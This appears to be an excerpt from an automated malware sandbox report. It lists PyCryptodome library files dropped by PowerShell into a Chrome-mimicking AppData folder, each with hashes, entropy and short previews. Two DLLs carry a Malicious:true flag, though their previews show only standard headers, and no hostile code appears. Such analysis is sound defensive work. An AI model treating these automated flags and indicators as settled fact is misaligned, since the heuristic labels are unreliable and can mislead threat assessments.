                                                                                                                                                                                                  Preview:from typing import Union, Dict, Tuple, Optional....Buffer = bytes|bytearray|memoryview....from Crypto.Cipher._mode_ecb import EcbMode..from Crypto.Cipher._mode_cbc import CbcMode..from Crypto.Cipher._mode_cfb import CfbMode..from Crypto.Cipher._mode_ofb import OfbMode..from Crypto.Cipher._mode_ctr import CtrMode..from Crypto.Cipher._mode_openpgp import OpenPgpMode..from Crypto.Cipher._mode_eax import EaxMode....def adjust_key_parity(key_in: bytes) -> bytes: .......DES3Mode = int....MODE_ECB: DES3Mode..MODE_CBC: DES3Mode..MODE_CFB: DES3Mode..MODE_OFB: DES3Mode..MODE_CTR: DES3Mode..MODE_OPENPGP: DES3Mode..MODE_EAX: DES3Mode....def new(key: Buffer,.. mode: DES3Mode,.. iv : Optional[Buffer] = ...,.. IV : Optional[Buffer] = ...,.. nonce : Optional[Buffer] = ...,.. segment_size : int = ...,.. mac_len : int = ...,.. initial_value : Union[int, Buffer] = ...,.. counter : Dict = ...) -> \.. Union[EcbMode, CbcMode, CfbMode, OfbMode, C

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\Crypto\Cipher\PKCS1_OAEP.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):8783
                                                                                                                                                                                                  Entropy (8bit):4.798422325497298
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:96:dEFQHvo7wHQeYz8L34mghqko9uN8I3y5xU3a5tLfZCMKesDBkFBIMd3T20kqk9ku:d6QHv13GFA4IywxoXKUF9ku
                                                                                                                                                                                                  MD5:1451B65F3E7EC1B91C1D496EAAA705D0
                                                                                                                                                                                                  SHA1:D695CB12CEE4E321748CA8E4DEBBC82945628769
                                                                                                                                                                                                  SHA-256:D924170C92BE9E1324DEDC5B731F92513CDF759A251148DF8ECF1A0E6011D77C
                                                                                                                                                                                                  SHA-512:5D002279E789E867E643F97B91C65C45DA561171D0CFCF6EC3A3CBB35BBD3B44923EC5249D89E788D637CF8F7D9617808C2CEE806775E49FB5E9D14B3B6A1BED
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:# -*- coding: utf-8 -*-..#..# Cipher/PKCS1_OAEP.py : PKCS#1 OAEP..#..# ===================================================================..# The contents of this file are dedicated to the public domain. To..# the extent that dedication to the public domain is not available,..# everyone is granted a worldwide, perpetual, royalty-free,..# non-exclusive license to exercise all rights associated with the..# contents of this file for any purpose whatsoever...# No rights are reserved...#..# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,..# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF..# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND..# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS..# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN..# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN..# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE..# SOFTWARE...# ======================

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\Crypto\Cipher\PKCS1_OAEP.pyi

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):1214
                                                                                                                                                                                                  Entropy (8bit):4.8233945885346685
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:24:1REjQFC19+1bs1zrhqMS8KDLYOT3OMIAl2HH8Myje+RGoziVEpvNtMEHo:gQFy+1o1IttDLteMI5aoJupVjHo
                                                                                                                                                                                                  MD5:A065FCD801FD38FDC5457C65A8B94801
                                                                                                                                                                                                  SHA1:7C353866EA0CFC0E55A90530714758115424B723
                                                                                                                                                                                                  SHA-256:DFEAE2746DEFD28744873401D008462C4C1EF4899B7BAFAEAE14FCA12A5BB73E
                                                                                                                                                                                                  SHA-512:959C65295EA6C93D67E7C1E5361A03C09CB7A37C7C64A92334A0C612952C3609708766780C99BD93DD5A9C23D79B7A3CF0C0614D083A13F3F9A8D5DBC3E6C7A2
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:from typing import Optional, Union, Callable, Any, overload..from typing_extensions import Protocol....from Crypto.PublicKey.RSA import RsaKey....class HashLikeClass(Protocol):.. digest_size : int.. def new(self, data: Optional[bytes] = ...) -> Any: .......class HashLikeModule(Protocol):.. digest_size : int.. @staticmethod.. def new(data: Optional[bytes] = ...) -> Any: .......HashLike = Union[HashLikeClass, HashLikeModule]....Buffer = Union[bytes, bytearray, memoryview]....class PKCS1OAEP_Cipher:.. def __init__(self,.. key: RsaKey,.. hashAlgo: HashLike,.. mgfunc: Callable[[bytes, int], bytes],.. label: Buffer,.. randfunc: Callable[[int], bytes]) -> None: ..... def can_encrypt(self) -> bool: ..... def can_decrypt(self) -> bool: ..... def encrypt(self, message: Buffer) -> bytes: ..... def decrypt(self, ciphertext: Buffer) -> bytes: .......def new(key: RsaKey,.. hashAlgo: O

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\Crypto\Cipher\PKCS1_v1_5.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):7208
                                                                                                                                                                                                  Entropy (8bit):4.875780210138466
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:96:dtFQHvov1zDH7zA3ZutH8MKD8LzmodYavD+U8FbPNapwDQVs3a:drQHvp42ME8H/d8RNuwk6a
                                                                                                                                                                                                  MD5:33552EE7C36C1E8B6AC76AAA51B18EA2
                                                                                                                                                                                                  SHA1:4B0476C73EFCA6264D64DEED3B2EC21F67B2FD82
                                                                                                                                                                                                  SHA-256:8BBD80ADF2035DED54365EB2076468D32E6BF9A5007C19557AFEAE19932A685F
                                                                                                                                                                                                  SHA-512:6AFE6599B48464CE0AEB8F29225A85EFE722C558E9F1F8EE30FD2EFB201FCC663F8E42355452D19AE905FDDB6A13C30E4FDBC57D17F94BDC118EBAAC90538A47
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:# -*- coding: utf-8 -*-..#..# Cipher/PKCS1-v1_5.py : PKCS#1 v1.5..#..# ===================================================================..# The contents of this file are dedicated to the public domain. To..# the extent that dedication to the public domain is not available,..# everyone is granted a worldwide, perpetual, royalty-free,..# non-exclusive license to exercise all rights associated with the..# contents of this file for any purpose whatsoever...# No rights are reserved...#..# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,..# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF..# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND..# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS..# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN..# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN..# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE..# SOFTWARE...# ======================

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\Crypto\Cipher\PKCS1_v1_5.pyi

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):706
                                                                                                                                                                                                  Entropy (8bit):4.785885591583499
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:12:1REYB1mmN+1bgBxpvIY3NwnNc1AlPcJZVyMnynj5wnZ03Rqqav+IAAozPmJifJEt:1REq7+1bspT3ENIAlUH8Myje+wqKozuP
                                                                                                                                                                                                  MD5:48B6BF106FC448220A97A73FBFA2425F
                                                                                                                                                                                                  SHA1:9899751126284AEC60B7D2C28047A93063B9CB20
                                                                                                                                                                                                  SHA-256:219BE400169E585320C518A50540EDA12E3C4F489322C42D56FDAD283D07A021
                                                                                                                                                                                                  SHA-512:D05EF3D93B5460A172FC3AB0E21B256CA3CE7BA3C7569E8074E01FDA2A7A309F63EEA6D7FB17D501DC77EC639C963B6D07A0EB0094A6DBF6C4645A30FB46D36E
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:from typing import Callable, Union, Any, Optional, TypeVar....from Crypto.PublicKey.RSA import RsaKey....Buffer = Union[bytes, bytearray, memoryview]..T = TypeVar('T')....class PKCS115_Cipher:.. def __init__(self,.. key: RsaKey,.. randfunc: Callable[[int], bytes]) -> None: ..... def can_encrypt(self) -> bool: ..... def can_decrypt(self) -> bool: ..... def encrypt(self, message: Buffer) -> bytes: ..... def decrypt(self, ciphertext: Buffer,.. sentinel: T,.. expected_pt_len: Optional[int] = ...) -> Union[bytes, T]: .......def new(key: RsaKey,.. randfunc: Optional[Callable[[int], bytes]] = ...) -> PKCS115_Cipher: .....

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\Crypto\Cipher\Salsa20.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):6516
                                                                                                                                                                                                  Entropy (8bit):4.625878868247197
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:96:GFQHvo7H4sIR05Jox+lgRXv8NBgQ9Qb3B0NpLPpnhtV8:UQHvMKDRXUNBgHGjRhtV8
                                                                                                                                                                                                  MD5:35B1A807346DF9FAD49A2396E0E7C64E
                                                                                                                                                                                                  SHA1:9A46CF85539233672C3ED0D06E4F1EE5B53BFB27
                                                                                                                                                                                                  SHA-256:80A7769DE32A81B8FB8CBE362066FF80711D630C0BEB39235246E4FD53E11870
                                                                                                                                                                                                  SHA-512:DF42F3A86A75FA52B2005A493B3E48CBDC0972CD81811C70308CB80D7006CE88FD6E9AA3393D2C687855030EF17A2031F4C8D5371888944FE8F8F2AC439C45C4
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:# -*- coding: utf-8 -*-..#..# Cipher/Salsa20.py : Salsa20 stream cipher (http://cr.yp.to/snuffle.html)..#..# Contributed by Fabrizio Tarizzo <fabrizio@fabriziotarizzo.org>...#..# ===================================================================..# The contents of this file are dedicated to the public domain. To..# the extent that dedication to the public domain is not available,..# everyone is granted a worldwide, perpetual, royalty-free,..# non-exclusive license to exercise all rights associated with the..# contents of this file for any purpose whatsoever...# No rights are reserved...#..# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,..# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF..# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND..# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS..# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN..# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\Crypto\Cipher\Salsa20.pyi

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):770
                                                                                                                                                                                                  Entropy (8bit):4.753367031924495
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:24:1RElTcAI4zFeBFAtnRNne3yFnR3Fne3rod8VYi:N4heryvesLe71+i
                                                                                                                                                                                                  MD5:F43BFBB1DE638F92162C8659DEFF5FCC
                                                                                                                                                                                                  SHA1:791719D6BDC25E30D7B0A7DB4AF08FF1A621A083
                                                                                                                                                                                                  SHA-256:EDCD33B9365AD546CF6B01C7FEFC73F1E7558BB50BFDB47FEF26212C2E027AE6
                                                                                                                                                                                                  SHA-512:1EEDEBCBCE99C19C2F489DDBD7B0C1B9020CBBC4A29C9E2E02AF3BA3FBECE0AB1E4F97BE2A62148F1E90B77B7B4AB88DAC847902BB984C7C4787D4B88D113B4B
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:from typing import Union, Tuple, Optional, overload, Optional....Buffer = bytes|bytearray|memoryview....class Salsa20Cipher:.. nonce: bytes.. block_size: int.. key_size: int.... def __init__(self,.. key: Buffer,.. nonce: Buffer) -> None: ..... @overload.. def encrypt(self, plaintext: Buffer) -> bytes: ..... @overload.. def encrypt(self, plaintext: Buffer, output: Union[bytearray, memoryview]) -> None: ..... @overload.. def decrypt(self, plaintext: Buffer) -> bytes: ..... @overload.. def decrypt(self, plaintext: Buffer, output: Union[bytearray, memoryview]) -> None: .......def new(key: Buffer, nonce: Optional[Buffer] = ...) -> Salsa20Cipher: .......block_size: int..key_size: Tuple[int, int]....

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\Crypto\Cipher\_ARC4.pyd

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):9216
                                                                                                                                                                                                  Entropy (8bit):4.959115197910263
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:T6Ieb9PEt0jBWMNWJzJjOjB/jAXMVn7MNN:ms0vYJ1j2r9n7WN
                                                                                                                                                                                                  MD5:47B5D19D47FCB7D3B7A946541E94B837
                                                                                                                                                                                                  SHA1:6208B03F489ACD43AAD70019861757DC8FA612B2
                                                                                                                                                                                                  SHA-256:4E5E63A8DF659E5600077203F4B96D9C4CCD9E676DB15F4E27F415DB80938DC3
                                                                                                                                                                                                  SHA-512:B9D89B2BC6D4760CB217B12016359920EAB375C68A0C33DA7AD26A3298B5A0BBEA1E7180B285F0816542BC3BB210F39EFB12399794DACFAA5AD95D63450ADA15
                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......'..co..co..co..j.?.go..v...ao..(...`o..co..Bo..v...ho..v...io..v...bo..Y..bo..Y..bo..Y.S.bo..Y..bo..Richco..................PE..L...9..e...........!...%............N........ ...............................`............@..........................%.......%..d....@.......................P..D...p!............................... ..@............ ..t............................text...S........................... ..`.rdata....... ......................@..@.data........0......................@....rsrc........@....... ..............@..@.reloc..D....P......."..............@..B........................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\Crypto\Cipher\_EKSBlowfish.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):5336
                                                                                                                                                                                                  Entropy (8bit):4.836111981939897
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:96:MHDqrYJALrYJHdt3EHGuITiwnHav1ZaVDYyOKgiaiJrJtk3I99m2Ht3HRF29:0qrskrs9t3q/ITHSVNi1bk3ITm6tXRY9
                                                                                                                                                                                                  MD5:A5F07807C63A0A82CFE7F644D72C9F9D
                                                                                                                                                                                                  SHA1:4F44ED26FD9770A9B8ED279C9E75FFEB2C84B756
                                                                                                                                                                                                  SHA-256:26B7450998B5E04410A77486C695457C58DCBC8DB24F50CC685651D223F3BE8E
                                                                                                                                                                                                  SHA-512:535FDCFDDDF7D64D097B0B51F64EBD14D453895B167E379D105E15F8F9681100B324A02004A3DD059B599EF88C01B81E0AD5546E90F1251EA2172BA5DF6D9252
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:# ===================================================================..#..# Copyright (c) 2019, Legrandin <helderijs@gmail.com>..# All rights reserved...#..# Redistribution and use in source and binary forms, with or without..# modification, are permitted provided that the following conditions..# are met:..#..# 1. Redistributions of source code must retain the above copyright..# notice, this list of conditions and the following disclaimer...# 2. Redistributions in binary form must reproduce the above copyright..# notice, this list of conditions and the following disclaimer in..# the documentation and/or other materials provided with the..# distribution...#..# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS..# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT..# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS..# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE..# COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FO

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\Crypto\Cipher\_EKSBlowfish.pyi

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):281
                                                                                                                                                                                                  Entropy (8bit):4.919666506917015
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:6:1REYBNHK+kb/Vfw1ggHzrIY3MTDyo5Alm0Wgw0Tm6sRy/6WXHg:1REYBQ+kzlbgHvIY3YyogmvNZRy/O
                                                                                                                                                                                                  MD5:4030500BC383DEE6F4BBDF228147813E
                                                                                                                                                                                                  SHA1:DE9B1C78DD481B3B42A29AB5485C2C1B3EDFF182
                                                                                                                                                                                                  SHA-256:4917140D2EAE01669B206BEAB2164796D2DF836CFBD8ACCC9189CF4E6EEBEDB2
                                                                                                                                                                                                  SHA-512:FCAE9156019C79B2033E53F4F0626FD729F8B99F6EB73C837330D5AE079F19CCBA33A7EB2C72CC3055C365B2ED272AFCD7313310A9C2F1120EA16FF0E7AFF63A
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:from typing import Union, Iterable....from Crypto.Cipher._mode_ecb import EcbMode....MODE_ECB: int....Buffer = Union[bytes, bytearray, memoryview]....def new(key: Buffer,.. mode: int,...salt: Buffer,...cost: int) -> EcbMode: .......block_size: int..key_size: Iterable[int]..

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\Crypto\Cipher\_chacha20.pyd

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):10752
                                                                                                                                                                                                  Entropy (8bit):5.548161556523813
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:TcKgdPEzpETBWctWJmIJjOs6PBSwCTh9lknMVnbENs:o8pEv4JmAjpABSwCTh9JnbOs
                                                                                                                                                                                                  MD5:54E6DE102DCBEF46AE7B5AC9F007E826
                                                                                                                                                                                                  SHA1:D3FE51E15B5F3AD186B44F69967593178FCFE537
                                                                                                                                                                                                  SHA-256:E7EF3EFE01606EBE564C1818EE5839A997CEB8B99846F6C4FBA86A09BCF9A507
                                                                                                                                                                                                  SHA-512:1B34C797E8ADA4085FD4F2B7169221EA70036D631329E6389611351F60FBCCAE0F1CBAE98CC232054615042DA101BFB7BDF4CB98807BDB0469886AC89C9293E5
                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......'..co..co..co..j.?.go..v...ao..(...`o..co..Bo..v...ho..v...io..v...bo..Y..bo..Y..bo..Y.S.bo..Y..bo..Richco..................PE..L...9..e...........!...%............N........0...............................p............@..........................5.......5..d....P.......................`..X...p1...............................0..@............0..t............................text............................... ..`.rdata..&....0......................@..@.data........@.......$..............@....rsrc........P.......&..............@..@.reloc..X....`.......(..............@..B........................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\Crypto\Cipher\_mode_cbc.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):11181
                                                                                                                                                                                                  Entropy (8bit):4.6088680499881525
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:9qrskrs9t3q/IY/5xlJT9O++U4/2+2U4+B0Xgvz:0rskrs9VqLzJJGTe+2T+Bp
                                                                                                                                                                                                  MD5:5391E17052FA07E0183AAA6C3AB6D344
                                                                                                                                                                                                  SHA1:31D25884252B3BFB909E20935C8447645E4C233A
                                                                                                                                                                                                  SHA-256:4707CD383304E7B5A84330F45EB3E49C72E905072E825859B54D033C87A0AFE7
                                                                                                                                                                                                  SHA-512:C134A89F9E6A02942AEA745A6F1232091841EB141874C8645448451B2857FEC4D3384B46FD054643673F083A8FF2D9B204CBA87F53FDD5CEA179AB619F36F8C6
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:# ===================================================================..#..# Copyright (c) 2014, Legrandin <helderijs@gmail.com>..# All rights reserved...#..# Redistribution and use in source and binary forms, with or without..# modification, are permitted provided that the following conditions..# are met:..#..# 1. Redistributions of source code must retain the above copyright..# notice, this list of conditions and the following disclaimer...# 2. Redistributions in binary form must reproduce the above copyright..# notice, this list of conditions and the following disclaimer in..# the documentation and/or other materials provided with the..# distribution...#..# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS..# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT..# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS..# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE..# COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FO

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\Crypto\Cipher\_mode_cbc.pyi

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):712
                                                                                                                                                                                                  Entropy (8bit):4.750220080456401
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:12:1REYBw1+sJal9lvIY3FDHiIRyE1AOlSFq6R5pFq6jI33ynFq6R5xnFq6jI338:1REP+LjT35istAY4nRNne3yFnR3Fne38
                                                                                                                                                                                                  MD5:30DD017C0985A1EFF693D631609C1DB6
                                                                                                                                                                                                  SHA1:378924C68A2872C951B6AB0291014CD3DD3C3B9C
                                                                                                                                                                                                  SHA-256:BCD20F1E0C545F56F186640614FEB8B125A2627F7A56F36DA2A3B2040EFE6FFC
                                                                                                                                                                                                  SHA-512:8029C5F0C2789E73A777C9F7609170DE099DDAF80CFDFDC912D2A48740661A5F831B729D7A2CCCC8A4A32CC22CE22480D4871615F49BCE958DB154B9120D4A3C
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:from typing import Union, overload....from Crypto.Util._raw_api import SmartPointer....Buffer = Union[bytes, bytearray, memoryview]....__all__ = ['CbcMode']....class CbcMode(object):.. block_size: int.. iv: Buffer.. IV: Buffer.... def __init__(self,.. block_cipher: SmartPointer,.. iv: Buffer) -> None: ..... @overload.. def encrypt(self, plaintext: Buffer) -> bytes: ..... @overload.. def encrypt(self, plaintext: Buffer, output: Union[bytearray, memoryview]) -> None: ..... @overload.. def decrypt(self, plaintext: Buffer) -> bytes: ..... @overload.. def decrypt(self, plaintext: Buffer, output: Union[bytearray, memoryview]) -> None: .......

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\Crypto\Cipher\_mode_ccm.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):25025
                                                                                                                                                                                                  Entropy (8bit):4.677063276164775
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:9qrskrs9t3q/I+9n1nXrBamtA6/c1VaO37n2x4Cg4wCy4g3NeVRWPv8GxvBsm:0rskrs9Vqb1n71/wH2x4swgg9eXWHVv5
                                                                                                                                                                                                  MD5:3E9660F26D207EF9A4C5A4CE2B3772AE
                                                                                                                                                                                                  SHA1:CBF049D0BDDB1592528978F77BA3AB75D2AC6227
                                                                                                                                                                                                  SHA-256:C65239369F4CF282246AC590FB630A4A83F9340BB41578DF6E419334F70642B5
                                                                                                                                                                                                  SHA-512:B8C5726C48B001E5B04FB512121466A27C4D35D90F5C2A890311BAF1B1E1B079C24BDE8CDAFB07090017BE1CC5B464F46E8C7074547CE2BC20BAA97FFA94894E
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:# ===================================================================..#..# Copyright (c) 2014, Legrandin <helderijs@gmail.com>..# All rights reserved...#..# Redistribution and use in source and binary forms, with or without..# modification, are permitted provided that the following conditions..# are met:..#..# 1. Redistributions of source code must retain the above copyright..# notice, this list of conditions and the following disclaimer...# 2. Redistributions in binary form must reproduce the above copyright..# notice, this list of conditions and the following disclaimer in..# the documentation and/or other materials provided with the..# distribution...#..# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS..# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT..# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS..# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE..# COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FO

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\Crypto\Cipher\_mode_ccm.pyi

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):1647
                                                                                                                                                                                                  Entropy (8bit):4.397477650476907
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:24:1RM7CnbKT3fAbSUA9UUOHMnRNne3yFnR3Fne3UPtWLn8no0E+XW3oIQ:cuuvUXUO8vesLeJLn8nlEF49
                                                                                                                                                                                                  MD5:91133F991531450E28EE3F680FBF6F20
                                                                                                                                                                                                  SHA1:BB3761FBD4A0F912A77258D73B30D7E43403130E
                                                                                                                                                                                                  SHA-256:5F0058DE990A9668E5B0CE2273E74E0D5BFDF79F5E6745DC9B8FAEB39822A9AD
                                                                                                                                                                                                  SHA-512:F5FAF2155B4D172D3DDAF556DF2EF28E5CE93CE81F471AED1D7215C658EF03C9DAB71FA3BDABD3133951A1A64EA628587F8390D330280518B2CA60F0E6451D74
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:from types import ModuleType..from typing import Union, overload, Dict, Tuple, Optional....Buffer = Union[bytes, bytearray, memoryview]....__all__ = ['CcmMode']....class CcmMode(object):.. block_size: int.. nonce: bytes.... def __init__(self,.. factory: ModuleType,.. key: Buffer,.. nonce: Buffer,.. mac_len: int,.. msg_len: int,.. assoc_len: int,.. cipher_params: Dict) -> None: ..... .. def update(self, assoc_data: Buffer) -> CcmMode: ....... @overload.. def encrypt(self, plaintext: Buffer) -> bytes: ..... @overload.. def encrypt(self, plaintext: Buffer, output: Union[bytearray, memoryview]) -> None: ..... @overload.. def decrypt(self, plaintext: Buffer) -> bytes: ..... @overload.. def decrypt(self, plaintext: Buffer, output: Union[bytearray, memoryview]) -> None: ....... def digest(self) -> bytes: ..... def hexdigest(self) -> str:

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\Crypto\Cipher\_mode_cfb.py

                                                                                                                                                                                                  Download File
